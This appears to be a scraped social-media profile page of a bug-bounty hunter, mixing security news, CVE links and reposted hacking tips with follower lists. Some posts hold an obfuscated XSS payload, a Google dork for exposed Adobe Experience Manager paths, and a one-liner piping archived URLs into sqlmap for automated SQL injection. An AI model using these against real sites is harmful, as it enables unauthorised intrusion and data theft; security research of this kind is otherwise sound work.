Olivia
Online
Kaio Gomes - KGSA
@kg4409
Ethical Hacking | BugHunter | Developer
127.0.0.1
Joined September 2021
200 Following
87 Followers
654 Posts
๐จ Researchers spotted real-world attacks exploiting a Linux flaw (CVE-2025-51591) in Pandoc to target AWS EC2 IMDS and steal IAM creds.
If youโre still on IMDSv1, youโre a sitting duck. Enforce IMDSv2 & sandbox Pandoc.
Details โ https://t.co/PXOCtrxNVL
Leak hole PoC for Chrome in-the-wild vulnerability CVE-2025-6554 published yesterday:
https://t.co/BYk7k8FAxL
CoinMarketCap is hacked... you will get drained!
NCIIPC in the pursuit of #Atmanirbhar_Bharat, cyber secured by its own young talent, is bringing the 2nd edition of the national level VAPT challenge - in partnership with AICTE and MoEโs Innovation Cell.
@AICTE_INDIA @mhrd_innovation
Stay tuned for further updates!
Who to follow
theWeertic
@theWeertic
Aaryan
@exploiT_bug89
Web Security Researcher๐ | Bug Bounty | CEH prepping
Breaking โ Understanding โ Documenting
PortSwigger labs + 151d TryHackMe streak
Abid Ahmad ๐ง๐ฉ๐ต๐ธ
@0xAb1d
MSc Cyber Security ๐ฌ๐ง | Cyber Security Researcher | Ethical Hacker | Penetration Tester | Coder
The popular AI agent "Manus" launched in China is automating about 50 tasks, and the scenario is too dystopian.
It's said to be more accurate than DeepSeek.
It can simultaneously perform SNS analysis, financial transactions, research, purchasing, and more.
Vuln: CSRF Leads do Open Redirect
Reward: $15
dev[.]to: https://t.co/0QCxKZdD7V
Medium: https://t.co/TqGy9cPbJ2
#bolhasec
@c4ng4c3ir0 rapaz, essa aรญ ficou topzera em
๐ขa XSS payload, Cuneiform-alphabet based ! ๐='',๐บ=!๐+๐,๐=!๐บ+๐,๐บ=๐+{},๐=๐บ[๐++], ๐=๐บ[๐ซ=๐],๐=++๐ซ+๐,๐น=๐บ[๐ซ+๐],๐บ[๐น+=๐บ[๐] +(๐บ.๐+๐บ)[๐]+๐[๐]+๐+๐+๐บ[๐ซ]+๐น+๐+๐บ[๐] +๐][๐น](๐[๐]+๐[๐ซ]+๐บ[๐]+๐+๐+"(๐)")()
#bugbounty #bugbountytips
![wtf_yodhha's tweet photo. ๐ขa XSS payload, Cuneiform-alphabet based ! ๐='',๐บ=!๐+๐,๐=!๐บ+๐,๐บ=๐+{},๐=๐บ[๐++], ๐=๐บ[๐ซ=๐],๐=++๐ซ+๐,๐น=๐บ[๐ซ+๐],๐บ[๐น+=๐บ[๐] +(๐บ.๐+๐บ)[๐]+๐[๐]+๐+๐+๐บ[๐ซ]+๐น+๐+๐บ[๐] +๐][๐น](๐[๐]+๐[๐ซ]+๐บ[๐]+๐+๐+"(๐)")()
#bugbounty #bugbountytips https://t.co/vaXWk3Eclu](https://pbs.twimg.com/media/GLrUy4WacAAWB52.jpg)
hacking is illegal and for nerds
Google Dork - Adobe Experience Manager (AEM) ๐
inurl:/content/usergenerated | inurl:/content/dam | inurl:/jcr:content | inurl:/libs/granite | inurl:/etc/clientlibs | inurl:/content/geometrixx | inurl:/bin/wcm | inurl:/crx/de site:example[.]com
![TakSec's tweet photo. Google Dork - Adobe Experience Manager (AEM) ๐
inurl:/content/usergenerated | inurl:/content/dam | inurl:/jcr:content | inurl:/libs/granite | inurl:/etc/clientlibs | inurl:/content/geometrixx | inurl:/bin/wcm | inurl:/crx/de site:example[.]com https://t.co/K3R6TYYifL](https://pbs.twimg.com/media/GLdh4gYaMAAR8KJ.png)
SQLMap from Waybackurls
waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}"
![bbr_bug's tweet photo. SQLMap from Waybackurls
waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}" https://t.co/yxzt8okWeP](https://pbs.twimg.com/media/GLR0Gc6WcAIQmhM.png)
๐ฅPOC https://t.co/yCFDZPfqEi
Just got a P1 reward along with @ArmanSameer95 after identifying a compromised server running a crypto miner on a #bugbounty program. I usually don't tweet about the bugs I find, but I think this is an interesting topic that's often overlooked yet can be rewarding.
CVE-2024-2879 WordPress LayerSlider Plugin - SQL Injection - Nuclei Template:
https://t.co/BgKTRYOwO8
#cve #nucleitemplate #bugbounty #offensivesec
Sometimes SQLmap and ghauri both act as dumb tools
I clearly have an SQLi and both tools failed to exploit it ๐
Python realmente facilita tudo o que se propรตe a fazer, nรฉ
@stux_rs to a 3 anos esperando um e nรฃo respondem KKKKKKKKKKKK
Se o cara fosse depender dos bounty pendente, o cara passava fome...
Most Popular Users
Elon Musk 
@elonmusk
240.3M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.6M followers
Cristiano Ronaldo
@cristiano
109.5M followers
Narendra Modi
@narendramodi
107M followers
Rihanna
@rihanna
97.4M followers
NASA
@nasa
92.1M followers
Justin Bieber
@justinbieber
90.7M followers
KATY PERRY
@katyperry
87.1M followers
Taylor Swift
@taylorswift13
81M followers
Lady Gaga
@ladygaga
72.5M followers
Kim Kardashian
@kimkardashian
69.5M followers
Virat Kohli
@imvkohli
69.1M followers
YouTube
@youtube
68.6M followers
Bill Gates
@billgates
63.6M followers
The Ellen Show
@theellenshow
62.5M followers
CNN
@cnn
61.9M followers
Neymar Jr
@neymarjr
61.7M followers
X
@x
60.9M followers
Selena Gomez
@selenagomez
60.2M followers